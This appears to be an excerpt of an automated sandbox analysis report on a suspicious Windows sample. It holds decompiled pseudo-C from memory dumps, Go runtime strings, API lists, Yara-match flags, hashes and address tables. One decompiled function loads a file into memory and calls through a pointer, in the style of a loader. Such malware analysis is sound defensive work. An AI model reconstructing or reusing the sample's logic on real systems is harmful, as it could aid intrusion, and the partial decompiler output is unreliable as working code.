                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            • API ID: _errno$_snprintffreemalloc$AllocateBoundaryDeleteDescriptorHeap_callnewh_invalid_parameter_noinfo

                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E01310100(void* __eax, signed int __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, signed long long __rdi, long long __rbp, void* __r14, void* _a8, long long _a16, long long _a24, signed long long _a32) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				signed char* _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				signed long long _v56;
                                                                                                                            				signed int _v60;
                                                                                                                            				intOrPtr _v64;
                                                                                                                            				long long _v72;
                                                                                                                            				char _v88;
                                                                                                                            				void* _v96;
                                                                                                                            				long long _v104;
                                                                                                                            				signed long long _v112;
                                                                                                                            				long long _v120;
                                                                                                                            				unsigned long long _v128;
                                                                                                                            				unsigned long long _v136;
                                                                                                                            				intOrPtr _v140;
                                                                                                                            				intOrPtr _v144;
                                                                                                                            				void* _t89;
                                                                                                                            				intOrPtr _t111;
                                                                                                                            				signed int _t121;
                                                                                                                            				void* _t123;
                                                                                                                            				void* _t126;
                                                                                                                            				signed int _t133;
                                                                                                                            				long long _t137;
                                                                                                                            				long long _t152;
                                                                                                                            				unsigned long long _t155;
                                                                                                                            				unsigned long long _t158;
                                                                                                                            				long long _t161;
                                                                                                                            				signed long long _t162;
                                                                                                                            				long long _t163;
                                                                                                                            				unsigned long long _t164;
                                                                                                                            				unsigned long long _t165;
                                                                                                                            				signed char* _t166;
                                                                                                                            				char* _t168;
                                                                                                                            				void* _t172;
                                                                                                                            				void* _t173;
                                                                                                                            				void* _t177;
                                                                                                                            				char* _t182;
                                                                                                                            				long long _t186;
                                                                                                                            				void* _t187;
                                                                                                                            				long long* _t190;
                                                                                                                            				void* _t191;
                                                                                                                            
                                                                                                                            				_t191 = __r14;
                                                                                                                            				_t162 = __rdi;
                                                                                                                            				_t152 = __rcx;
                                                                                                                            				_t150 = __rbx;
                                                                                                                            				_t136 = __rax;
                                                                                                                            				_t125 = __esi;
                                                                                                                            				_t121 = __ecx;
                                                                                                                            				_t88 = __eax;
                                                                                                                            				_t173 = _t172 - 0x50;
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t168 =  &_v8;
                                                                                                                            				if(__rax == 0) {
                                                                                                                            					L17:
                                                                                                                            					_t137 = 0x138da1a;
                                                                                                                            					_t111 = 0x29;
                                                                                                                            					_t89 = E01330BA0(0x138da1a, _t150, _t168);
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					L18:
                                                                                                                            					while(1) {
                                                                                                                            						if(_t173 <=  *((intOrPtr*)(_t191 + 0x10))) {
                                                                                                                            							L33:
                                                                                                                            							_v72 = _t137;
                                                                                                                            							_v64 = _t111;
                                                                                                                            							_v60 = _t121;
                                                                                                                            							_v56 = _t162;
                                                                                                                            							_v48 = _t163;
                                                                                                                            							_t89 = E01356200(_t155, _t168);
                                                                                                                            							_t137 = _v72;
                                                                                                                            							_t111 = _v64;
                                                                                                                            							_t121 = _v60;
                                                                                                                            							_t162 = _v56;
                                                                                                                            							_t163 = _v48;
                                                                                                                            							continue;
                                                                                                                            						}
                                                                                                                            						_t173 = _t173 - 0x60;
                                                                                                                            						_v88 = _t168;
                                                                                                                            						_t168 =  &_v88;
                                                                                                                            						_v72 = _t137;
                                                                                                                            						_v56 = _t162;
                                                                                                                            						_t155 =  *(_t163 + 0x20) << 0xd >> 3;
                                                                                                                            						if((_t155 & 0x00000003) != 0) {
                                                                                                                            							L32:
                                                                                                                            							_t137 = 0x138b2ab;
                                                                                                                            							_t111 = 0x1a;
                                                                                                                            							E01330BA0(0x138b2ab, _t150, _t168);
                                                                                                                            							goto L33;
                                                                                                                            						}
                                                                                                                            						if(_t111 != 0) {
                                                                                                                            							E01330BA0(0x138aad8, _t150, _t168);
                                                                                                                            							goto L32;
                                                                                                                            						}
                                                                                                                            						_v120 =  *((intOrPtr*)(_t163 + 0x68));
                                                                                                                            						while(_t155 > 0) {
                                                                                                                            							_v136 = _t155;
                                                                                                                            							_v96 = _t137;
                                                                                                                            							_t164 = _t155;
                                                                                                                            							_t89 = E0130F840(_t111, _t121, _t137, _t162, _t164, _t168, _t191);
                                                                                                                            							_v104 = _t137;
                                                                                                                            							_v140 = _t111;
                                                                                                                            							_v144 = _t121;
                                                                                                                            							_v112 = _t162;
                                                                                                                            							_v128 = _t164;
                                                                                                                            							_t158 = _t164;
                                                                                                                            							_t165 = _t164 >> 2;
                                                                                                                            							if(_v120 != 8) {
                                                                                                                            								_t89 = L01358F20(_t89, _t111, _t121, _t122, _t123, _t125, _v96, _t165, _t158);
                                                                                                                            								goto L22;
                                                                                                                            							} else {
                                                                                                                            								_t182 = _v96;
                                                                                                                            								r10d = 0;
                                                                                                                            								while(_t187 < _t165) {
                                                                                                                            									 *_t182 = 0xff;
                                                                                                                            									_t187 = _t187 + 1;
                                                                                                                            									_t182 = _t182 + 1;
                                                                                                                            								}
                                                                                                                            								L22:
                                                                                                                            								_t155 = _v136 - _v128;
                                                                                                                            								_t137 = _v104;
                                                                                                                            								_t121 = _v144;
                                                                                                                            								_t111 = _v140;
                                                                                                                            								_t162 = _v112;
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							break;
                                                                                                                            						}
                                                                                                                            						return _t89;
                                                                                                                            						goto L34;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_a8 = __rax;
                                                                                                                            					if( *((intOrPtr*)(__rax)) != __rdi) {
                                                                                                                            						L16:
                                                                                                                            						_a32 = _t162;
                                                                                                                            						E013513C0(_t121, _t123, _t125, _t126, _t136, _t150, _t162, _t168, _t177, _t191);
                                                                                                                            						_v24 = _t136;
                                                                                                                            						_v40 = _t150;
                                                                                                                            						_v48 =  *_a8;
                                                                                                                            						E01332340(_t155, _t168, _t191);
                                                                                                                            						E01332C40(_t121, _t123, _t125, _t126, 0x138d8aa, _t150, _t168, _t191);
                                                                                                                            						_t150 = _v40;
                                                                                                                            						E01332C40(_t121, _t123, _t125, _t126, _v24, _v40, _t168, _t191);
                                                                                                                            						E01332C40(_t121, _t123, _t125, _t126, 0x1387696, _v40, _t168, _t191);
                                                                                                                            						E01332940(_t123, _t125, _t126, _v48,  *_a8, _t168, _t191);
                                                                                                                            						E01332C40(_t121, _t123, _t125, _t126, 0x1388d40, _v40, _t168, _t191);
                                                                                                                            						E01332940(_t123, _t125, _t126, _a32,  *_a8, _t168, _t191);
                                                                                                                            						E013325A0(_t121, _t122, _t123, _t125, _t126, _t168, _t191);
                                                                                                                            						L013323C0(_t155, _t168, _t191);
                                                                                                                            						E01330BA0(0x138d0f3, _v40, _t168);
                                                                                                                            						goto L17;
                                                                                                                            					} else {
                                                                                                                            						_t122 =  *(__rax + 0x17) & 0x000000ff;
                                                                                                                            						if(( *(__rax + 0x17) & 0x40) != 0) {
                                                                                                                            							E013513C0(__ecx, _t123, __esi, _t126, __rax, __rbx, __rdi, _t168, _t177, __r14);
                                                                                                                            							_v24 = __rax;
                                                                                                                            							_v40 = __rbx;
                                                                                                                            							E01332340(_t155, _t168, __r14);
                                                                                                                            							E01332C40(__ecx, _t123, __esi, _t126, 0x138d8aa, __rbx, _t168, __r14);
                                                                                                                            							_t150 = _v40;
                                                                                                                            							E01332C40(__ecx, _t123, __esi, _t126, _v24, _t150, _t168, __r14);
                                                                                                                            							E01332C40(__ecx, _t123, __esi, _t126, 0x13883ae, _t150, _t168, __r14);
                                                                                                                            							L013323C0(_t155, _t168, __r14);
                                                                                                                            							_t136 = 0x138d0f3;
                                                                                                                            							E01330BA0(0x138d0f3, _t150, _t168);
                                                                                                                            							goto L16;
                                                                                                                            						} else {
                                                                                                                            							if( *0x14cf564 == 0) {
                                                                                                                            								return __eax;
                                                                                                                            							} else {
                                                                                                                            								_a16 = __rbx;
                                                                                                                            								_a24 = __rcx;
                                                                                                                            								_t161 =  *((intOrPtr*)( *((intOrPtr*)(__r14 + 0x30)) + 0xa0));
                                                                                                                            								_v16 = _t161;
                                                                                                                            								_t166 =  *((intOrPtr*)(__rax + 0x20));
                                                                                                                            								r8d = 0;
                                                                                                                            								while( *((intOrPtr*)(_t136 + 8)) > _t162) {
                                                                                                                            									_t133 = _t162 & 0x0000003f;
                                                                                                                            									if(_t133 != 0) {
                                                                                                                            										r8d = r8d >> 1;
                                                                                                                            									} else {
                                                                                                                            										r8d =  *_t166 & 0x000000ff;
                                                                                                                            										_t166 =  &(_t166[1]);
                                                                                                                            									}
                                                                                                                            									asm("inc ecx");
                                                                                                                            									if(_t133 < 0) {
                                                                                                                            										_t190 =  *((intOrPtr*)(_t161 + 0x1260));
                                                                                                                            										 *_t190 =  *((intOrPtr*)(_t162 + _t150));
                                                                                                                            										 *((long long*)(_t190 + 8)) =  *((intOrPtr*)(_t162 + _t152));
                                                                                                                            										_t186 =  *((intOrPtr*)(_t161 + 0x1260)) + 0x10;
                                                                                                                            										 *((long long*)(_t161 + 0x1260)) = _t186;
                                                                                                                            										if( *((intOrPtr*)(_t161 + 0x1268)) == _t186) {
                                                                                                                            											_v56 = _t162;
                                                                                                                            											_v60 = r8d;
                                                                                                                            											_v32 = _t166;
                                                                                                                            											_t88 = E0132A340(_t136, _t168, _t191);
                                                                                                                            											_t136 = _a8;
                                                                                                                            											_t152 = _a24;
                                                                                                                            											_t161 = _v16;
                                                                                                                            											_t150 = _a16;
                                                                                                                            											_t166 = _v32;
                                                                                                                            											_t162 = _v56;
                                                                                                                            											r8d = _v60;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            									_t162 = _t162 + 8;
                                                                                                                            								}
                                                                                                                            								return _t88;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				L34:
                                                                                                                            			}
















































                                                                                                                            Strings
                                                                                                                            • runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncaching span but s.allocCount == 0) is sma, xrefs: 0131026A, 0131030F
                                                                                                                            • runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added o, xrefs: 01310234, 013102A5
                                                                                                                            • runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: found s.elem != nil in cachenon-empty mark queue after concurrent markon a locked , xrefs: 01310325
                                                                                                                            • but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModul, xrefs: 013102E5
                                                                                                                            • of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF, xrefs: 013102C5
                                                                                                                            • with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWHanifi_RohingyaImpersonateSelfOpenThreadTokenOther_LowercaseOther, xrefs: 01310254
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGetComputerNameExWGetExitCodeProcessGetFileAttributesWGetModul$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateF$ with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWHanifi_RohingyaImpersonateSelfOpenThreadTokenOther_LowercaseOther$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncaching span but s.allocCount == 0) is sma$runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done but phase is not GCoffmheap.freeSpanLocked - invalid span statemheap.freeSpanLocked - invalid stack freeobjects added o$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testacquireSudog: found s.elem != nil in cachenon-empty mark queue after concurrent markon a locked
                                                                                                                            • API String ID: 0-2335534072
                                                                                                                            • Opcode ID: 8d9064964c2f3ca3e1589eb4a4b66c5081d3978dcfc1166389ca0f4eddcd67b5
                                                                                                                            • Instruction ID: dabe5dd1226303fb4e16f6118e0940ddaf8661c0811fd61e4c7bf7402fd72260
                                                                                                                            • Opcode Fuzzy Hash: 8d9064964c2f3ca3e1589eb4a4b66c5081d3978dcfc1166389ca0f4eddcd67b5
                                                                                                                            • Instruction Fuzzy Hash: 77518C36218B84C6DB19EF59E48039EBB64F799B88F944121EF8D07B69CF38C591CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0000025B25BF8A6F370(intOrPtr __edx, void* __esi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				void* _v40;
                                                                                                                            				char _v64;
                                                                                                                            				char _v88;
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __r13;
                                                                                                                            				void* _t26;
                                                                                                                            				intOrPtr _t49;
                                                                                                                            				void* _t67;
                                                                                                                            				void* _t69;
                                                                                                                            				void* _t74;
                                                                                                                            				intOrPtr* _t75;
                                                                                                                            				long long _t91;
                                                                                                                            				void* _t109;
                                                                                                                            				long long _t110;
                                                                                                                            				void* _t122;
                                                                                                                            				void* _t123;
                                                                                                                            				long long* _t126;
                                                                                                                            				intOrPtr* _t127;
                                                                                                                            
                                                                                                                            				_t122 = __r9;
                                                                                                                            				_t120 = __r8;
                                                                                                                            				_t76 = __rbx;
                                                                                                                            				_t75 = __rax;
                                                                                                                            				_t68 = __esi;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rbp;
                                                                                                                            				_a24 = __rsi;
                                                                                                                            				_t109 = __rcx;
                                                                                                                            				_t126 = __r8;
                                                                                                                            				_t49 = __edx;
                                                                                                                            				E0000025B25BF8A73124(0x1000, __esi, __rax, __rbx, __rsi, __rbp);
                                                                                                                            				r14d = 0x800;
                                                                                                                            				E0000025B25BF8A73278(r14d, _t75);
                                                                                                                            				_t112 = _t75;
                                                                                                                            				_t26 = E0000025B25BF8A73278(r14d, _t75);
                                                                                                                            				r8d = _t49;
                                                                                                                            				E0000025B25BF8A73230(_t26,  &_v64, _t109);
                                                                                                                            				r8d = r14d;
                                                                                                                            				E0000025B25BF8A733B8(_t76,  &_v64, _t75);
                                                                                                                            				E0000025B25BF8A7A52C(_t76, _t75, 0xf8a8bb10, _t75, _t75, _t120, _t122);
                                                                                                                            				_t110 = _t75;
                                                                                                                            				_t6 = _t75 - 1; // -1
                                                                                                                            				if (_t6 - 0xfffffffd > 0) goto 0xf8a6f528;
                                                                                                                            				r8d = 0x25bf8a8bb12;
                                                                                                                            				fseek(??, ??, ??);
                                                                                                                            				E0000025B25BF8A7AE18(_t75, _t76, _t110);
                                                                                                                            				r8d = 0;
                                                                                                                            				_t127 = _t75;
                                                                                                                            				fseek(??, ??, ??);
                                                                                                                            				_t8 = _t127 - 1; // -1
                                                                                                                            				if (_t8 - _t75 > 0) goto 0xf8a6f509;
                                                                                                                            				r9d = 0;
                                                                                                                            				r14d = E0000025B25BF8A8B4F0(0xfffffffe, _t49, r14d, _t67, _t69, _t74, _t75, _t76, _t112, 0xf8a8bb10, _t110, _t112, _t123, _t126);
                                                                                                                            				_t9 = _t75 - 1; // -1
                                                                                                                            				if (_t9 - 0x7ff > 0) goto 0xf8a6f502;
                                                                                                                            				malloc(??);
                                                                                                                            				_t91 =  *0xf8a9d8a8; // 0xd9f400038dc4
                                                                                                                            				r8d =  *0xf8a9d8b0; // 0xda43
                                                                                                                            				 *((long long*)(_t75 + 0x10)) = _t91;
                                                                                                                            				 *_t75 = r8d;
                                                                                                                            				r8d = r8d + 1;
                                                                                                                            				_t77 = _t75;
                                                                                                                            				 *((long long*)(_t75 + 8)) = _t110;
                                                                                                                            				 *((intOrPtr*)(_t75 + 4)) = r15d;
                                                                                                                            				 *0xf8a9d8a8 = _t75;
                                                                                                                            				 *0xf8a9d8b0 = r8d;
                                                                                                                            				E0000025B25BF8A6C364(E0000025B25BF8A6C364(E0000025B25BF8A6C334(_t49, 0x1000, _t75, _t75,  &_v88, _t110),  *_t75,  &_v88), r15d,  &_v88);
                                                                                                                            				r8d = r14d;
                                                                                                                            				E0000025B25BF8A6C2A8(_t68, _t75,  &_v88, _t112);
                                                                                                                            				E0000025B25BF8A6C400(E0000025B25BF8A73274( &_v88),  &_v88);
                                                                                                                            				r8d = 2;
                                                                                                                            				 *_t126();
                                                                                                                            				E0000025B25BF8A6C310(_t40, _t75,  &_v88, _t110);
                                                                                                                            				goto 0xf8a6f535;
                                                                                                                            				goto 0xf8a6f50e;
                                                                                                                            				E0000025B25BF8A6D03C(_t75,  &_v88, _t112, _t112, _t75);
                                                                                                                            				E0000025B25BF8A7320C(_t75, _t112);
                                                                                                                            				fclose(??);
                                                                                                                            				goto 0xf8a6f53d;
                                                                                                                            				E0000025B25BF8A6D03C(_t77, _t110, _t112, _t112, _t75);
                                                                                                                            				return E0000025B25BF8A7320C(_t75, _t112);
                                                                                                                            			}






















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1756087678-0
                                                                                                                            • Opcode ID: 255f0e2d2d8364b95d48539cf85664292cfab175bb059365731960e5348beca0
                                                                                                                            • Instruction ID: 5e368b156c31a140d234eae114193f14b32b022a1f86746fcc7d8193663e60a3
                                                                                                                            • Opcode Fuzzy Hash: 255f0e2d2d8364b95d48539cf85664292cfab175bb059365731960e5348beca0
                                                                                                                            • Instruction Fuzzy Hash: EF41A123304E9052EF11EB22AC193AD6251F788BE1FA19125BE5A47FDADF3CC5028758
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A7A538(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r9, void* _a8, void* _a16, void* _a32) {
                                                                                                                            				void* _t8;
                                                                                                                            				intOrPtr* _t15;
                                                                                                                            				intOrPtr* _t27;
                                                                                                                            
                                                                                                                            				_t15 = _t27;
                                                                                                                            				 *((long long*)(_t15 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t15 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t15 + 0x20)) = __rsi;
                                                                                                                            				 *((long long*)(_t15 + 0x18)) = __r8;
                                                                                                                            				if (__rdx == 0) goto 0xf8a7a580;
                                                                                                                            				if (__r8 == 0) goto 0xf8a7a580;
                                                                                                                            				if (__r9 != 0) goto 0xf8a7a59f;
                                                                                                                            				_t8 = E0000025B25BF8A7B89C(_t15);
                                                                                                                            				 *_t15 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t8);
                                                                                                                            				return 0;
                                                                                                                            			}







                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1640621425-0
                                                                                                                            • Opcode ID: 94ede83721b29951deade4c3a87e27cd6241ef0a99defbf4f0aa5ada93c88977
                                                                                                                            • Instruction ID: 9e6f39d10976e9a3517709166c2b171c2853c353cb5f8730ca0a83ec577c35b6
                                                                                                                            • Opcode Fuzzy Hash: 94ede83721b29951deade4c3a87e27cd6241ef0a99defbf4f0aa5ada93c88977
                                                                                                                            • Instruction Fuzzy Hash: D5410823300F8056FE669A225D4A35EA692F754FF1F384120BE6647FD1FB78E441A218
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0130AAC0(void* __eax, signed int __ebx, signed int __rax, signed int __rdx, void* __rdi, long long __rbp, void* __r14, signed int _a8, signed int _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				signed int _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				signed int _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				signed short _v42;
                                                                                                                            				void* _t51;
                                                                                                                            				void* _t72;
                                                                                                                            				signed int _t82;
                                                                                                                            				signed int _t85;
                                                                                                                            				signed int _t87;
                                                                                                                            				signed short _t88;
                                                                                                                            				void* _t90;
                                                                                                                            				signed int _t100;
                                                                                                                            				long long _t102;
                                                                                                                            				long long _t115;
                                                                                                                            				long long _t117;
                                                                                                                            				long long _t118;
                                                                                                                            				signed int _t120;
                                                                                                                            				void* _t122;
                                                                                                                            				void* _t123;
                                                                                                                            				void* _t127;
                                                                                                                            				void* _t130;
                                                                                                                            				signed int _t131;
                                                                                                                            				void* _t132;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t133 = __r14;
                                                                                                                            					_t125 = __rbp;
                                                                                                                            					_t122 = __rdi;
                                                                                                                            					_t120 = __rdx;
                                                                                                                            					_t100 = __rax;
                                                                                                                            					_t73 = __ebx;
                                                                                                                            					if(_t127 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t125 =  &_v8;
                                                                                                                            					_t85 = __ebx & 0x000000ff;
                                                                                                                            					if(__rdx >= 0x88) {
                                                                                                                            						L12:
                                                                                                                            						_t100 = _t120;
                                                                                                                            						E013588C0();
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_v16 = __rdx;
                                                                                                                            					_a16 = __ebx;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_t117 =  *((intOrPtr*)(__rax + 0x28 + __rdx * 8));
                                                                                                                            					_v24 = _t117;
                                                                                                                            					_t102 = _t117;
                                                                                                                            					_t51 = E0130F1C0(__eax, _t82, _t85, _t102,  &_v8, _t130, _t132, __r14);
                                                                                                                            					_t118 = _v24;
                                                                                                                            					_t120 =  *((intOrPtr*)(_t118 + 0x38));
                                                                                                                            					if(_t102 != _t120) {
                                                                                                                            						L5:
                                                                                                                            						_t115 = _t102;
                                                                                                                            					} else {
                                                                                                                            						L3:
                                                                                                                            						_v32 = _t120;
                                                                                                                            						_t82 =  *(_t118 + 0x60) & 0x0000ffff;
                                                                                                                            						if(_t120 != _t118) {
                                                                                                                            							L11:
                                                                                                                            							_v42 = _t82;
                                                                                                                            							E01332340(_t120, _t125, _t133);
                                                                                                                            							E01332C40(_t82, _t87, _t88, _t90, 0x138a811, _t115, _t125, _t133);
                                                                                                                            							E01332940(_t87, _t88, _t90, 0x138a811, _t118, _t125, _t133);
                                                                                                                            							E01332C40(_t82, _t87, _t88, _t90, 0x1387725, _t115, _t125, _t133);
                                                                                                                            							E01332940(_t87, _t88, _t90, _v32, _t118, _t125, _t133);
                                                                                                                            							E013325A0(_t82, _t85, _t87, _t88, _t90, _t125, _t133);
                                                                                                                            							L013323C0(_t120, _t125, _t133);
                                                                                                                            							_t73 = 0x31;
                                                                                                                            							E01330BA0(0x138e747, _t115, _t125);
                                                                                                                            							goto L12;
                                                                                                                            						} else {
                                                                                                                            							L4:
                                                                                                                            							_v40 = _t102;
                                                                                                                            							_t72 = E01311F80(_t51, _a16 & 0x000000ff, _t90, _a8, _t120, _t123,  &_v8, __r14);
                                                                                                                            							_t102 =  *((intOrPtr*)(_a8 + 0x28 + _v16 * 8));
                                                                                                                            							_v24 = _t102;
                                                                                                                            							_t51 = E0130F1C0(_t72, _t82, _t85, _t102,  &_v8, _t130, _t132, __r14);
                                                                                                                            							_t120 = _v32;
                                                                                                                            							_t115 = _v40;
                                                                                                                            							_t118 = _v24;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L6:
                                                                                                                            					if( *((intOrPtr*)(_t118 + 0x38)) <= _t102) {
                                                                                                                            						L10:
                                                                                                                            						E01330BA0(0x138a156, _t115, _t125);
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					L7:
                                                                                                                            					_t88 = ( *(_t118 + 0x60) & 0x0000ffff) + 1;
                                                                                                                            					 *(_t118 + 0x60) = _t88;
                                                                                                                            					_t87 = _t88 & 0x0000ffff;
                                                                                                                            					_t131 =  *((intOrPtr*)(_t118 + 0x38));
                                                                                                                            					if(_t131 < _t122) {
                                                                                                                            						L9:
                                                                                                                            						_v42 = _t88;
                                                                                                                            						_v32 = _t131;
                                                                                                                            						E01332340(_t120, _t125, _t133);
                                                                                                                            						E01332C40(_t82, _t87, _t88, _t90, 0x13882f8, _t115, _t125, _t133);
                                                                                                                            						E01332940(_t87, _t88, _t90, 0x13882f8, _t118, _t125, _t133);
                                                                                                                            						E01332C40(_t82, _t87, _t88, _t90, 0x1387725, _t115, _t125, _t133);
                                                                                                                            						E01332940(_t87, _t88, _t90, _v32, _t118, _t125, _t133);
                                                                                                                            						E013325A0(_t82, _t85, _t87, _t88, _t90, _t125, _t133);
                                                                                                                            						L013323C0(_t120, _t125, _t133);
                                                                                                                            						E01330BA0(0x138a828, _t115, _t125);
                                                                                                                            						goto L10;
                                                                                                                            					}
                                                                                                                            					L8:
                                                                                                                            					return _t51;
                                                                                                                            					L14:
                                                                                                                            					L13:
                                                                                                                            					_a8 = _t100;
                                                                                                                            					_a16 = _t73;
                                                                                                                            					E01356200(_t120, _t125);
                                                                                                                            				}
                                                                                                                            			}




























                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab20
                                                                                                                            0x0130ab27
                                                                                                                            0x0130ac36
                                                                                                                            0x0130ac36
                                                                                                                            0x0130ac40
                                                                                                                            0x0130ac51
                                                                                                                            0x0130ac60
                                                                                                                            0x0130ac71
                                                                                                                            0x0130ac80
                                                                                                                            0x0130ac85
                                                                                                                            0x0130ac8a
                                                                                                                            0x0130ac96
                                                                                                                            0x0130aca0
                                                                                                                            0x00000000
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab40
                                                                                                                            0x0130ab4f
                                                                                                                            0x0130ab54
                                                                                                                            0x0130ab59
                                                                                                                            0x0130ab5e
                                                                                                                            0x0130ab63
                                                                                                                            0x0130ab68
                                                                                                                            0x0130ab68
                                                                                                                            0x0130ab27
                                                                                                                            0x0130ab72
                                                                                                                            0x0130ab76
                                                                                                                            0x0130ac25
                                                                                                                            0x0130ac31
                                                                                                                            0x00000000
                                                                                                                            0x0130ac31
                                                                                                                            0x0130ab7c
                                                                                                                            0x0130ab8c
                                                                                                                            0x0130ab8e
                                                                                                                            0x0130ab92
                                                                                                                            0x0130ab95
                                                                                                                            0x0130ab9c
